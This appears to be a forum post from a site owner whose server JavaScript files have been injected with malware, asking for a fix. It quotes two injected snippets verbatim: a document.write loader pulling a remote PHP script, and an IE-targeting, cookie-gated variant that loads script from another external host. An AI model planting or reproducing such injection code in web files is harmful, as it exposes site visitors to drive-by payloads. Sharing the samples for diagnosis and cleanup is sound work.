We're getting most JS files in our server injected with malware code.
Something like this:
Or this:
I hope a solution can be found. This is a problem that needs to be fixed ASAP!
Something like this:
HTML:
/*cc3b29*/
document.write("<script src='http://quadfreunde-nordeifel.de/kalender/wHXy6DBL.php?id=132732700' type='text/javascript'></" + "script>");
/*/cc3b29*/
Or this:
HTML:
/*820a93*/
function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}
if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user4 = getCookie("awqawq09");if (user4 !=="awqawq"){setCookie("awqawq09", "awqawq", 7, "/"); cookieawq09awq();}}} function cookieawq09awq(){document.write("<script src='http://www.tilt.org/blog/zbqHmWnj.php?id=132732726' type='text/javascript'></" + "script>");}
function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
/*/820a93*/
I hope a solution can be found. This is a problem that needs to be fixed ASAP!